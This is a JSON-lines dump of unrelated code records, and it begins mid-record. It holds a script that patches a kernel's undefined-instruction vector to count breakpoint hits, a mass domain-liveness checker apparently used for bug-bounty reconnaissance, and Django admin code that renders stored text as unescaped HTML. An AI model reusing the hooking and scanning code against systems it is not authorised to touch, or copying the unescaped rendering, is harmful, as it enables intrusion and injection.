#\".Lhandle:\"\n #\"ldr r0, [sp, #8];\" # restore r0, lr, spsr\n #\"msr spsr_cxsf, r0;\"\n #\"ldmia sp, {{r0, lr}};\"\n\n \"stmdb sp!, {{r0-r3}};\"\n #\"mrs r0, spsr;\"\n #\"and r0, r0, #0x1f;\" # check mode for those without independent SPSR\n #\"teq r0, #0x10;\" # skip user\n #\"beq .Lund;\"\n #\"teq r0, #0x1f;\" # skip system\n #\"beq .Lund;\"\n\n \"adr r0, .Lbp;\" # verify breakpoints\n \"ldr r1, $.Lstat;\"\n \"sub r2, r2, r2;\"\n\n \".Lloop:\"\n \"ldr r3, [r0, r2, LSL#2];\"\n \"adds r3, r3, #0;\" # - check end of list (breakpoints)\n \"beq .Lund;\"\n \"add r3, r3, #4;\" # (assume arm mode, lr will be the next inst after the breakpoint) check thumb?\n \"teq r3, lr;\" # - check breakpoint match\n \"beq .Lupdate;\"\n \"add r2, r2, #1;\"\n \"b .Lloop;\"\n\n \".Lupdate:\" # update hit counter\n \"add r3, r1, r2, LSL#2;\"\n \".Lretrylog:\"\n \"ldrex r1, [r3];\"\n \"add r1, r1, #1;\"\n \"strex r0, r1, [r3];\" # check failed?\n \"tst r0, r0;\"\n \"bne .Lretrylog;\"\n\n \"ldr r0, $.Lstorage;\"\n \"mrc p15, 0, r1, c0, c0, 5;\" # read MPIDR to get core number\n \"and r1, r1, #15;\"\n \"add r0, r0, r1, LSL#2;\"\n \".Lretrystub:\"\n \"ldrex r3, [r0];\"\n \"strex r3, lr, [r0];\" # store return address, check cpu id?\n \"tst r3, r3;\"\n \"bne .Lretrystub;\"\n \"adr lr, .Lstub;\" # start restore\n \"add lr, lr, r2, LSL#3;\"# find stub (@r2: bp index)\n \"ldmia sp!, {{r0-r3}};\"\n \"movs pc, lr;\" # trigger context switch\n\n \".Lrestore:\" # restore original control flow\n \"sub sp, sp, #4;\"\n \"stmdb sp, {{r0-r1}};\"\n \"ldr r0, $.Lstorage;\"\n \"mrc p15, 0, r1, c0, c0, 5;\" # read MPIDR to get core number\n \"and r1, r1, #15;\"\n \"add r0, r0, r1, LSL#2;\"\n \"ldrex r0, [r0];\" # atomic load\n \"clrex;\" # clear execution monitor\n #\"sub r4, r4, r4; ldr r4, [r4];\" # page fault debug\n \"str r0, [sp];\"\n \"ldmdb sp, {{r0-r1}};\"\n \"ldmia sp!, {{pc}};\"\n\n \".Lund:\" # und faulting - have to restore the original und_excp handler here\n \"ldmia sp!, {{r0-r3}};\" # Linux init proc invokes und inst on boot, probably breakpoint setup\n \".byte {ORIG_UND_VEC};\"\n \"ldr pc, [pc, #-4];\"\n \".word {ORIG_UND_REST};\"\n \"b $.;\"\n\n \".Lstub:\" # stub for the original inst replaced by breakpoint\n #\"mov r12, sp;\" # NOTE: at this point the only register got messed up is PC (r15),\n #\"b .Lrestore;\" # be careful with PC relative load/store/branch etc.\n \"{STUB}\"\n \".Lstorage:\" # storage of lr reg for context switch, no worry if original inst mess up with registers\n \".word {LR_STORAGE};\" # - one should make sure there are enough space (one reg_size(4 bytes) for each cpu core)\n \".Lstat:\" # address to store stat info\n \".word {STAT_STORAGE};\" # - space requirement: 4 bytes per breakpoints\n \".Lbp:\" # null-ended list of breakpoint address\n \".word {BREAKPOINTS};\"\n \".word 0;\".format(\n ORIG_UND_VEC=\",\".join([hex(c) for c in tramp_orig_bytes]),\n ORIG_UND_REST=hex(tramp_orig_rest),\n LR_STORAGE=hex(storage_vaddr),\n STAT_STORAGE=hex(storage_vaddr+0x10),\n BREAKPOINTS=\",\".join([hex(p) for p in breakpoints]),\n STUB=\"\".join([\".byte {};b .Lrestore;\".format(b) for b in oldbytes])\n )\n , main_patch_vaddr)\n\n\n# Second round, We've only patched VFP emulation, Now to patch the default UNDEF\nund_va = 0xfc028fe4 # Found through JTAG: mdw 0xffff0120\nmain_patch_vaddr += 0x400 # Another dispatcher\nmain_patch_off += 0x400\nund_handle = None\nund_off = mm.translate(und_va)\nprint(hex(und_off))\nsig = mm._read(und_off, 0x1000)\nfor i in cs.disasm(sig, und_va):\n print (i)\n # check when overwrites pc\n if i.op_str.startswith(\"pc,\"):\n sig = sig[:i.address-und_va+i.size]\n break\n\nund_kernimg_off = None\nfor match in re.finditer(b2pat(sig), kernel_data):\n print([hex(x) for x in match.span()])\n assert (not und_kernimg_off)\n und_kernimg_off = match.start()\nassert(und_kernimg_off)\nprint(hex(und_kernimg_off))\n\npatch_off = und_kernimg_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n #\"b $.;\"\n #\"stmdb sp!, {{r0-r3}};\"\n #\"mrc p15, 0, r0, c1, c0, 0;\"\n #\"tst r0, #1;\"\n \"ldr pc, $.Ldispat;\"\n \".Ldispat:\"\n \".word {DISPATCH_VADDR};\".format(\n DISPATCH_VADDR=hex(main_patch_vaddr),\n DISPATCH_PADDR=hex(mm.translate(main_patch_vaddr)),\n ), und_va)\ntramp_orig_bytes = patchset[patch_off][1]\ntramp_orig_rest = und_va + len(tramp_orig_bytes)\n\npatch_off = main_patch_off\npatchset[patch_off] = patching(kernel_data, patch_off,\n \"stmdb sp!, {{r0-r3}};\"\n\n \"adr r0, .Lbp;\" # verify breakpoints\n \"sub r2, r2, r2;\"\n\n \".Lloop:\"\n \"ldr r3, [r0, r2, LSL#2];\"\n \"adds r3, r3, #0;\" # - check end of list (breakpoints)\n \"beq .Lund;\"\n \"add r3, r3, #4;\" # (assume arm mode, lr will be the next inst after the breakpoint) check thumb?\n \"teq r3, lr;\" # - check breakpoint match\n \"beq .Lupdate;\"\n \"add r2, r2, #1;\"\n \"b .Lloop;\"\n\n \".Lupdate:\" # update hit counter\n\n \"adr lr, .Lstub;\" # start restore\n \"add lr, lr, r2, LSL#4;\"# find stub (@r2: bp index)\n \"ldmia sp!, {{r0-r3}};\"\n \"movs pc, lr;\" # trigger context switch\n\n \".Lund:\" # und faulting - have to restore the original und_excp handler here\n \"ldmia sp!, {{r0-r3}};\" # Linux init proc invokes und inst on boot, probably breakpoint setup\n \".byte {ORIG_UND_VEC};\"\n \"ldr pc, [pc, #-4];\"\n \".word {ORIG_UND_REST};\"\n \"b $.;\"\n\n \".Lstub:\" # stub for the original inst replaced by breakpoint\n #\"mov r12, sp;\" # NOTE: at this point the only register got messed up is PC (r15),\n #\"ldr pc, [pc, #-4];\" # be careful with PC relative load/store/branch etc.\n #\".word {BP Return Addr};\"\n #\"b $.;\"\n \"{STUB}\"\n \".Lbp:\" # null-ended list of breakpoint address\n \".word {BREAKPOINTS};\"\n \".word 0;\".format(\n ORIG_UND_VEC=\",\".join([hex(c) for c in tramp_orig_bytes]),\n ORIG_UND_REST=hex(tramp_orig_rest),\n BREAKPOINTS=\",\".join([hex(p) for p in breakpoints]),\n STUB=\"\".join([\".byte {};ldr pc, [pc, #-4];.word {};b $.;\".format(b,r+4) for b,r in zip(oldbytes,breakpoints)])\n )\n , main_patch_vaddr)\n\n\n\n\n# All Done, now output\nprint(\"storage address: \", hex(storage_vaddr))\n\nif len(sys.argv) > 5:\n with open(sys.argv[5], 'wb') as fd:\n data = kernel_data\n for off, patch in patchset.items():\n data = data[:off] + bytes(patch[0]) + data[off+len(patch[0]):]\n fd.write(data)\n","sub_path":"patch_riscos.py","file_name":"patch_riscos.py","file_ext":"py","file_size_in_byte":17311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"524820528","text":"class Movie():\n \"\"\"A simple class to store movie information.\n\n :type title: : str\n :param title: Title of the movie\n\n :type poster_image_url: :str\n :param poster_image_url: URL of desired movie poster or image.\n\n :type trailer_youtube_url: str\n :param trailer_youtube_url: YouTube URL of movie trailer.\n\n :type release_date: str\n :param release_date: Year of movie release.\n \"\"\"\n\n def __init__(self, title, poster_image_url, trailer_youtube_url, release_date):\n self.title = title\n self.poster_image_url = poster_image_url\n self.trailer_youtube_url = trailer_youtube_url\n self.release_date = release_date\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"259462712","text":"# https://www.jiuzhang.com/solutions/continuous-subarray-sum#tag-highlight-lang-python\nclass Solution:\n def checkSubarraySum(self, nums: List[int], k: int) -> bool:\n return self.dp_bottomup(nums, k)\n\n def dp_bottomup(self, nums, k):\n # O(N^2), O(N)\n if len(nums) < 2:\n return False\n\n n = len(nums)\n dp = [0] * n\n dp[0] = nums[0]\n for i in range(1, n):\n dp[i] = dp[i - 1] + nums[i]\n\n for i in range(n):\n for j in range(i + 1, n):\n val = dp[j] - dp[i] + nums[i]\n if k != 0:\n if val // k * k == val:\n return True\n elif val == k:\n return True\n return False\n","sub_path":"leetcode/lc523_Continuous_Subarray_Sum.py","file_name":"lc523_Continuous_Subarray_Sum.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"321114156","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nspinMultiplicity = 2\n\nenergy = {\n\t'CCSD(T)-F12/cc-pVTZ-F12': MolproLog('TSN12_f12.out'),\n}\n\nfrequencies = GaussianLog('ts12-freq.log')\n\nrotors = [HinderedRotor(scanLog=GaussianLog('83methyl_scan.log'), pivots=[4,6], top=[6,7,8,9], symmetry=3, fit='best'),]\n","sub_path":"data/quantum/ts/gAlkoxyIsom/TS.py","file_name":"TS.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"425613127","text":"from __future__ import absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement\n\nfrom django import forms\nfrom django.conf.urls import url as urls_url\nfrom django.contrib import admin\nfrom django.contrib.admin import helpers\nfrom django.contrib.admin.templatetags.admin_list import _boolean_icon\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Count, Sum\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.template import RequestContext\nfrom django.utils.encoding import smart_text\nfrom django.utils.functional import cached_property\nfrom django.utils.html import format_html\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom ..conf import settings\nfrom ..forms.clubs import ClubRegistrationAdminForm, ClubJournalEntryAdminForm, ClubJournalLeaderEntryAdminForm\nfrom ..models import *\nfrom ..utils import currency, comma_separated\n\nfrom .export import AdminExportMixin\nfrom .filters import SchoolYearListFilter, ClubListFilter, LeaderListFilter\n\n\nclass ClubGroupAdmin(admin.ModelAdmin):\n list_display = ('name', 'order')\n list_editable = ('order',)\n\n\n\nclass ClubTimeInlineAdmin(admin.TabularInline):\n model = ClubTime\n extra = 0\n\nclass ClubPeriodInlineAdmin(admin.TabularInline):\n model = ClubPeriod\n extra = 0\n ordering = ('start',)\n\nclass ClubAttachmentInlineAdmin(admin.TabularInline):\n model = ClubAttachment\n extra = 3\n\nclass ClubAdmin(AdminExportMixin, admin.ModelAdmin):\n list_display = (\n 'name', 'get_groups_list', 'get_leaders_list',\n 'get_times_list', 'get_periods_list',\n 'place', 'public', 'reg_active',\n 'get_registrations_link', 'get_journal_link', 'icon', 'note',\n )\n list_editable = ('public', 'reg_active', 'note')\n list_filter = (\n ('school_year', SchoolYearListFilter),\n 'age_groups',\n 'groups',\n ('leaders', LeaderListFilter),\n )\n inlines = (\n ClubTimeInlineAdmin,\n ClubPeriodInlineAdmin,\n ClubAttachmentInlineAdmin,\n )\n filter_horizontal = ('age_groups', 'groups', 'leaders')\n actions = (\n 'publish', 'unpublish',\n 'allow_registration', 'disallow_registration',\n 'merge',\n )\n search_fields = ('name', 'description')\n save_as = True\n\n def get_queryset(self, request):\n return super(ClubAdmin, self).get_queryset(request)\\\n .annotate(registrations_count=Count('registrations'))\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(ClubAdmin, self).get_form(request, obj, **kwargs)\n if obj:\n school_year = obj.school_year\n else:\n school_year = request.school_year\n leaders_choices = form.base_fields['leaders'].widget.widget.choices\n leaders_choices.queryset = leaders_choices.queryset.filter(school_years = school_year)\n form.base_fields['leaders'].choices = leaders_choices\n return form\n\n def publish(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(public = True)\n self.message_user(request, _('Selected clubs were published.'))\n publish.short_description = _('Publish selected clubs')\n\n def unpublish(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(public = False)\n self.message_user(request, _('Selected clubs were unpublished.'))\n unpublish.short_description = _('Unpublish selected clubs')\n\n def allow_registration(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(reg_active = True)\n self.message_user(request, _('Registration was allowed for selected clubs.'))\n allow_registration.short_description = _('Allow registration for selected clubs')\n\n def disallow_registration(self, request, queryset):\n Club.objects.filter(id__in=[reg['id'] for reg in queryset.values('id')]).update(reg_active = False)\n self.message_user(request, _('Registration was disallowed for selected clubs.'))\n disallow_registration.short_description = _('Disallow registration for selected clubs')\n\n def merge(self, request, queryset):\n class MergeForm(forms.Form):\n target = forms.ModelChoiceField(\n label=_('Target club'),\n help_text=_('All information will be merged into selected club.'),\n queryset=queryset,\n )\n if request.POST.get('post', 'no') == 'yes':\n form = MergeForm(request.POST)\n if form.is_valid():\n target = form.cleaned_data['target']\n clubs = [ club for club in queryset.all() if club != target ]\n for club in clubs:\n # merge groups\n for group in club.all_groups:\n target.groups.add(group)\n # merge age_groups\n for age_group in club.all_age_groups:\n target.age_groups.add(age_group)\n # merge leaders\n for leader in club.all_leaders:\n target.leaders.add(leader)\n # merge times\n for time in club.all_times:\n time.club = target\n time.save()\n # merge questions\n for question in club.all_questions:\n target.questions.add(question)\n # merge registrations\n for registration in club.all_registrations:\n registration.club = target\n registration.save()\n # merge journal_entries\n for entry in club.all_journal_entries:\n entry.club = target\n entry.save()\n club.delete()\n self.message_user(request, _('Selected clubs were merged into club {}.').format(club))\n return\n else:\n form = MergeForm()\n return render_to_response('domecek/admin/club_merge.html', {\n 'title': _('Select target club for merge'),\n 'queryset': queryset,\n 'opts': self.model._meta,\n 'form': form,\n 'action_checkbox_name': helpers.ACTION_CHECKBOX_NAME,\n }, context_instance=RequestContext(request))\n merge.short_description = _('Merge selected clubs into one')\n\n def get_registrations_link(self, obj):\n icon = False\n if obj.registrations_count == 0:\n title = _('There are no registrations for this club.')\n elif obj.min_count is not None and obj.registrations_count < obj.min_count:\n title = _('The number of registrations is lower than {}.').format(obj.min_count)\n elif obj.max_count is not None and obj.registrations_count > obj.max_count:\n title = _('The number of registrations is greater than {}.').format(obj.max_count)\n else:\n icon = True\n title = ''\n return '{icon} {count}'.format(\n url = reverse('admin:{}_{}_changelist'.format(\n ClubRegistration._meta.app_label,\n ClubRegistration._meta.model_name,\n )) + '?club={}'.format(obj.id),\n title = title,\n icon = _boolean_icon(icon),\n count = obj.registrations_count,\n )\n get_registrations_link.short_description = _('registrations')\n get_registrations_link.admin_order_field = 'registrations_count'\n get_registrations_link.allow_tags = True\n\n def get_journal_link(self, obj):\n return '{journal}'.format(\n url = reverse('admin:domecek_club_journal', args=[obj.id]),\n title = _('printable club journal'),\n journal = _('journal'),\n )\n get_journal_link.short_description = _('journal')\n get_journal_link.allow_tags = True\n\n def get_urls(self):\n urls = super(ClubAdmin, self).get_urls()\n return [\n urls_url(r'(?P\\d+)/journal/$', self.admin_site.admin_view(self.journal), name='domecek_club_journal'),\n ] + urls\n\n def journal(self, request, club_id):\n club = get_object_or_404(Club, id=club_id)\n return render_to_response('domecek/club_journal.html', {\n 'club': club,\n 'admin': True,\n }, context_instance=RequestContext(request))\n\n def icon(self, obj):\n return obj.photo and '\"\"/'.format(\n admin_url = obj.photo.get_admin_url_path(),\n icon_url = obj.photo.icons['48'],\n ) or ''\n icon.allow_tags = True\n icon.short_description = _('photo')\n\n\n\nclass ClubRegistrationAdmin(AdminExportMixin, admin.ModelAdmin):\n form = ClubRegistrationAdminForm\n list_display = (\n 'id', 'get_download_tag', 'club', 'participant', 'parents_link',\n 'discount', 'get_payments_partial_balance_html', 'get_payments_total_balance_html', 'get_club_payments', 'created',\n 'cancel_request', 'canceled',\n )\n list_export = (\n 'id', 'created', 'club', 'age_group',\n 'participant__first_name', 'participant__last_name', 'participant__birth_num',\n 'participant__email', 'participant__phone', 'school_name', 'school_class',\n 'participant__street', 'participant__city', 'participant__postal_code', 'citizenship', 'insurance', 'health',\n 'parents', 'parent_emails',\n 'get_payments_partial_balance', 'get_payments_total_balance',\n )\n list_filter = (\n ('club__school_year', SchoolYearListFilter),\n ('club', ClubListFilter),\n ('club__leaders', LeaderListFilter),\n )\n actions = ('send_mail',)\n search_fields = (\n 'participant__first_name', 'participant__last_name',\n 'participant__birth_num', 'participant__email',\n 'participant__parents__first_name', 'participant__parents__last_name', 'participant__parents__email',\n 'school__name', 'club__name',\n )\n ordering = ('-cancel_request', '-created')\n raw_id_fields = ('club', 'participant')\n\n def has_add_permission(self, request):\n return False\n\n def get_fields(self, request, obj=None):\n fields = super(ClubRegistrationAdmin, self).get_fields(request, obj)\n if obj:\n fields += ['q_'+q.name for q in obj.club.all_questions]\n return fields\n\n def parents(self, obj):\n return comma_separated(obj.participant.all_parents)\n parents.short_description = _('parents')\n\n def parent_emails(self, obj):\n return ', '.join(\n '{} <{}>'.format(p.full_name, p.email)\n for p in obj.participant.all_parents if p.email\n )\n parent_emails.short_description = _('parent emails')\n\n def school_name(self, obj):\n return obj.school_name\n school_name.short_description = _('school')\n\n def get_download_tag(self, obj):\n return 'PDF'.format(reverse('admin:domecek_clubregistration_pdf', args=(obj.id,)))\n get_download_tag.short_description = _('download')\n get_download_tag.allow_tags = True\n\n def get_fullname(self, obj):\n return '{} {}'.format(obj.participant.first_name, obj.participant.last_name)\n get_fullname.short_description = _('full name')\n\n @cached_property\n def parents_url(self):\n return reverse('admin:domecek_parent_changelist')\n\n def parents_link(self, obj):\n return '{names}'.format(\n url = self.parents_url,\n participant = obj.participant.id,\n names = ', '.join(smart_text(parent) for parent in obj.participant.all_parents),\n )\n parents_link.allow_tags = True\n parents_link.short_description = _('parents')\n\n def get_club_payments(self, obj):\n html = []\n price = obj.club.price\n for period in obj.get_period_payment_statuses():\n html.append(format_html('{period}: {amount}',\n period = period.period.name,\n color = period.status.color,\n href = reverse('admin:domecek_clubpayment_changelist') + '?registration={}'.format(obj.id),\n title = period.status.title,\n amount = currency(period.status.paid),\n ))\n return mark_safe('
'.join(html) + format_html('   ',\n href = reverse('admin:domecek_clubpayment_add') + '?registration={}'.format(obj.id),\n title = _('add payment'),\n ))\n get_club_payments.short_description = _('club payments')\n\n def get_payments_partial_balance(self, obj):\n return obj.get_payment_statuses().partial.balance\n get_payments_partial_balance.short_description = _('actual balance')\n\n def get_payments_total_balance(self, obj):\n return obj.get_payment_statuses().total.balance\n get_payments_total_balance.short_description = _('total balance')\n\n def get_payments_partial_balance_html(self, obj):\n status = obj.get_payment_statuses().partial\n return '{balance}'.format(\n color = status.color,\n balance = currency(status.balance),\n title = status.title,\n )\n get_payments_partial_balance_html.allow_tags = True\n get_payments_partial_balance_html.short_description = _('actual balance')\n\n def get_payments_total_balance_html(self, obj):\n status = obj.get_payment_statuses().total\n return '{balance}'.format(\n color = status.color,\n balance = currency(status.balance),\n title = status.title,\n )\n get_payments_total_balance_html.allow_tags = True\n get_payments_total_balance_html.short_description = _('total balance')\n\n def get_urls(self):\n urls = super(ClubRegistrationAdmin, self).get_urls()\n return [\n urls_url(r'(?P\\d+).pdf$', self.admin_site.admin_view(self.pdf), name='domecek_clubregistration_pdf'),\n ] + urls\n\n def pdf(self, request, reg_id):\n from ..views.clubs import ClubRegistrationPdfView\n return ClubRegistrationPdfView.as_view()(request, pk=reg_id)\n\n def send_mail(self, request, queryset):\n for registration in queryset.all():\n recipients = registration.all_recipients\n if recipients:\n registration.send_mail()\n self.message_user(\n request,\n _('Registration {registration} ({id}) successfully sent to {recipients}.').format(\n registration = registration,\n id = registration.id,\n recipients = comma_separated(recipients),\n ),\n )\n else:\n self.message_user(\n request,\n _('Registration {registration} ({id}) has no recipients.').format(\n registration = registration,\n id = registration.id,\n ),\n )\n send_mail.short_description = _('Send selected registrations by email')\n\n\n\nclass ClubPaymentAdmin(AdminExportMixin, admin.ModelAdmin):\n list_display = ('registration', 'date', 'amount')\n list_filter = (\n ('registration__club__school_year', SchoolYearListFilter),\n ('registration__club', ClubListFilter),\n )\n search_fields = ('registration__club__name', 'registration__participant__first_name', 'registration__participant__last_name',\n 'registration__participant__birth_num')\n date_hierarchy = 'date'\n ordering = ('-date',)\n raw_id_fields = ('registration',)\n\n\n\nclass ClubJournalLeaderEntryAdmin(AdminExportMixin, admin.ModelAdmin):\n form = ClubJournalLeaderEntryAdminForm\n list_display = ('timesheet', 'date', 'start', 'end', 'duration', 'club')\n list_filter = (('timesheet__leader', LeaderListFilter),)\n ordering = ('-club_entry__date', '-start')\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if obj and obj.timesheet.submitted:\n return False\n return super(ClubJournalLeaderEntryAdmin, self).has_delete_permission(request, obj)\n\n def get_readonly_fields(self, request, obj=None):\n if obj and obj.timesheet.submitted:\n return ('start', 'end')\n return self.readonly_fields\n\n\n\nclass ClubJournalLeaderEntryInlineAdmin(admin.TabularInline):\n class form(forms.ModelForm):\n class Meta:\n model = ClubJournalLeaderEntry\n fields = []\n model = ClubJournalLeaderEntry\n ordering = ('club_entry__date', 'start')\n readonly_fields = ('date', 'start', 'end', 'edit_link')\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if obj:\n # obj may be Timesheet or ClubJournalEntry\n # this inline is used in both ClubJournalEntryAdmin and TimesheetAdmin\n try:\n entries = obj.leader_entries\n except AttributeError:\n entries = obj.club_entries\n if entries.filter(timesheet__submitted=True).exists():\n return False\n return super(ClubJournalLeaderEntryInlineAdmin, self).has_delete_permission(request, obj)\n\n def edit_link(self, obj):\n return '{edit}'.format(\n url = reverse('admin:domecek_clubjournalleaderentry_change', args=[obj.id]),\n title = _('update entry'),\n edit = _('edit'),\n )\n edit_link.short_description = ''\n edit_link.allow_tags = True\n\nclass ClubJournalEntryAdmin(AdminExportMixin, admin.ModelAdmin):\n form = ClubJournalEntryAdminForm\n date_hierarchy = 'date'\n list_display = ('club_name', 'period_name', 'date', 'start', 'end', 'duration', 'agenda_html')\n list_filter = (\n ('period__club__school_year', SchoolYearListFilter),\n ('period__club', ClubListFilter),\n )\n filter_horizontal = ('participants',)\n inlines = (ClubJournalLeaderEntryInlineAdmin,)\n ordering = ('-date', '-start')\n readonly_fields = ('club_name', 'period_name', 'date',)\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n if obj:\n if obj.leader_entries.filter(timesheet__submitted=True).exists():\n return False\n else:\n return super(ClubJournalEntryAdmin, self).has_delete_permission(request, obj)\n return False\n\n def get_actions(self, request):\n actions = super(ClubJournalEntryAdmin, self).get_actions(request)\n if 'delete_selected' in actions:\n del(actions['delete_selected'])\n return actions\n\n def club_name(self, obj):\n return obj.period.club.name\n club_name.short_description = _('club')\n club_name.admin_order_field = 'period__club__name'\n\n def period_name(self, obj):\n return obj.period.name\n period_name.short_description = _('period')\n period_name.admin_order_field = 'period__name'\n\n def agenda_html(self, obj):\n return obj.agenda\n agenda_html.short_description = _('agenda')\n agenda_html.admin_order_field = 'agenda'\n agenda_html.allow_tags = True\n\n\n","sub_path":"domecek/admin/clubs.py","file_name":"clubs.py","file_ext":"py","file_size_in_byte":20269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"349414902","text":"from django.shortcuts import render, redirect, get_object_or_404\nimport json\n# Create your views here.\nfrom django.urls import reverse_lazy,reverse\nfrom django.http import HttpResponse, JsonResponse\nfrom projpad.models import *\nfrom django.db.models import Sum\nfrom appprincipal.forms import *\nfrom .forms import *\nfrom projpad.models import *\nfrom django.core import serializers\n#from chartit import DataPool, Chart, PivotDataPool, PivotChart\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef Hist_2015_1(request):\n item = Hist_voo2015.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Janeiro',\n }\n return render(request, 'hist2015.html', context)\n\n\ndef Hist_2015_2(request):\n item = Hist_voo2015_2.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Fevereiro',\n }\n return render(request, 'hist2015.html', context)\n\n\ndef Hist_2015_3(request):\n item = Hist_voo2015_3.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Março',\n }\n return render(request, 'hist2015.html', context)\n\ndef Hist_2015_4(request):\n item = Hist_voo2015_4.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Abril',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_5(request):\n item = Hist_voo2015_5.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Maio',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_6(request):\n item = Hist_voo2015_6.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 junho',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_7(request):\n item = Hist_voo2015_7.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Julho',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_8(request):\n item = Hist_voo2015_8.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Agosto',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_9(request):\n item = Hist_voo2015_9.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Setembro',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_10(request):\n item = Hist_voo2015_10.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Outubro',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_11(request):\n item = Hist_voo2015_11.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2015 Novembro',\n }\n return render(request, 'hist2015.html', context) \n\ndef Hist_2015_12(request):\n item = Hist_voo2015_12.objects.all() \n context = {\n 'item': item,\n 'header': 'Historico 2015 Dezembro',\n }\n return render(request, 'hist2015.html', context) \n\ndef historico(request):\n queryset = Hist_voo2015.objects.all()\n sigla = [obj.sigla for obj in queryset]\n situacao = [obj.situacao for obj in queryset]\n\n context = {\n 'sigla': json.dumps(sigla),\n 'situacao': json.dumps(situacao),\n }\n return render(request, 'historico.html', context)\n\ndef dashboard_with_pivot(request):\n return render(request, 'dashboard_with_pivot.html', {})\n\n\ndef pivot_data(request):\n dataset = Order.objects.all()\n data = serializers.serialize('json', dataset)\n return JsonResponse(data, safe=False)\n\n\n\ndef Hist_2016_1(request):\n item = Hist_voo2016.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2016 Janeiro',\n }\n return render(request, 'hist2016.html', context)\n\n\ndef Hist_2016_2(Hist_2016_1):\n pass\n context = {\n 'header': 'Historico 2016 Fervereiro',\n }\n return render(Hist_2016_1, 'hist2016.html', context)\n\ndef Hist_2016_3(Hist_2016_1):\n pass\n context = {\n 'header': 'Historico 2016 Março',\n }\n return render(Hist_2016_1, 'hist2016.html', context)\n\ndef Hist_2017_1(request):\n item = Hist_voo2017.objects.all()\n context = {\n 'item': item,\n 'header': 'Historico 2017 Janeiro',\n }\n return render(request, 'hist2017.html', context)\n\n","sub_path":"appprincipal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"436930556","text":"import re\nimport requests,os\nfrom termcolor import *\nfrom multiprocessing import Pool,Manager\ndef check(i,q):\n try:\n requests.get(\"http://\"+i,timeout=5)\n except:\n try:\n requests.get(\"https://\"+i,timeout=5)\n except:\n print(colored(i+\" is not alive\",\"red\"))\n return\n q.append(i)\n print(colored(i+\" is alive\",\"green\"))\n # alive.append(i)\ndef check_domain_alive(file):\n with open(file,\"r\") as f:\n misc=f.read()\n res=re.sub(r'(\\d{1,3}\\.){3}\\d{1,3}',\"\",misc)\n res=res.replace(\" \",\"\\n\").split(\"\\n\")\n for i in range(len(res)):\n res[i]=res[i].strip()\n while True:\n try:\n res.remove(\"\")\n except:\n break\n q= Manager().list()\n num=os.cpu_count()\n while res:\n \n \n p = Pool(num)#最多同时执行4个进程\n\n for i in range(num):\n try:\n tmp=res.pop()\n except:\n break\n p.apply_async(check, args=(tmp,q,))\n p.close()\n p.join()\n f=open(\"alive_\"+file,\"w\")\n while q:\n tmp=q.pop()\n print(tmp)\n f.write(tmp+\"\\n\")\n f.close()\n\nif __name__=='__main__':\n check_domain_alive(input(\"filename:\"))\n \n\n","sub_path":"2020/butian_fucker/域名存活检测/check_domain_alive.py","file_name":"check_domain_alive.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"650602096","text":"from __future__ import unicode_literals\n\n\n# Models which support custom fields\nCUSTOMFIELD_MODELS = (\n 'provider', 'circuit', # Circuits\n 'site', 'rack', 'devicetype', 'device', # DCIM\n 'aggregate', 'prefix', 'ipaddress', 'vlan', 'vrf', 'service', # IPAM\n 'secret', # Secrets\n 'tenant', # Tenancy\n 'cluster', 'virtualmachine', # Virtualization\n)\n\n# Custom field types\nCF_TYPE_TEXT = 100\nCF_TYPE_INTEGER = 200\nCF_TYPE_BOOLEAN = 300\nCF_TYPE_DATE = 400\nCF_TYPE_URL = 500\nCF_TYPE_SELECT = 